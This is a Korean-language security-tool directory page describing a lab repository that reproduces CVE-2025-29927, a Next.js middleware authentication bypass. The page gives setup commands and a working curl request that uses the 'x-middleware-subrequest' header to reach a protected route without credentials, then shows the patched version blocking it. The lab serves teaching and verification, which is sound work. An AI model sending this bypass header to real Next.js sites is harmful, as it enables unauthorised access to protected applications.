Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cve-2025-29927-lab — CVE-2025-29927 재현 연구소 — Next.js 미들웨어 인증 우회 (CVSS 9.1) | Kitploit
도구/GitHubGitHub/swapnildeshpande/cve-2025-29927-lab
Vulnerability AnalysisWeb Application ExploitationPenetration TestingAuthenticationLearning & EducationLabs & Practice
GitHubswapnildeshpande/cve-2025-29927-lab

cve-2025-29927-lab

CVE-2025-29927 재현 연구소 — Next.js 미들웨어 인증 우회 (CVSS 9.1)

저장소 보기
2개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-29927 실습 환경

CVE-2025-29927에 대한 최소 재현 실습 환경입니다. — Next.js 미들웨어 인증 우회 (CVSS 9.1).

관련 자료: Medium의 N-Day 분석 글

이 실습 개요

취약한 Next.js 15.2.2 애플리케이션으로, 쿠키로 보호된 /dashboard 경로가 있습니다. 미들웨어 인증 검사는 단일 HTTP 헤더 하나를 보내는 것만으로 우회할 수 있습니다 — 자격 증명이 필요하지 않습니다.

요구 사항

  • Node.js 18+

설정

root@kitploit:~
git clone https://github.com/SwapnilDeshpande/cve-2025-29927-lab
cd cve-2025-29927-lab
npm install   # pins to Next.js 15.2.2 (vulnerable)
npm run dev -- --port 3001

우회 재현

1단계 — 미들웨어가 인증되지 않은 요청을 차단하는지 확인:

root@kitploit:~
curl -s -o /dev/null -w "%{http_code}" http://localhost:3001/dashboard
# → 307

2단계 — 서브리퀘스트 헤더로 미들웨어 우회:

root@kitploit:~
curl -s -o /dev/null -w "%{http_code}" \
  -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
  http://localhost:3001/dashboard
# → 200

3단계 — 패치된 버전으로 업그레이드하고 우회가 차단되는지 확인:

root@kitploit:~
npm install [email protected]
# Restart the dev server, then repeat Step 2
# → 307

앱 경로

경로접근 권한
/공개
/login공개
/dashboard미들웨어로 보호됨 (session 쿠키 필요)

영향을 받는 버전

Next.js < 15.2.3, < 14.2.25, < 13.5.9, < 12.3.5

참고 자료

  • NVD — CVE-2025-29927
  • Next.js 패치 PR #77201
  • 취약 소스 — sandbox.ts
도구 다운로드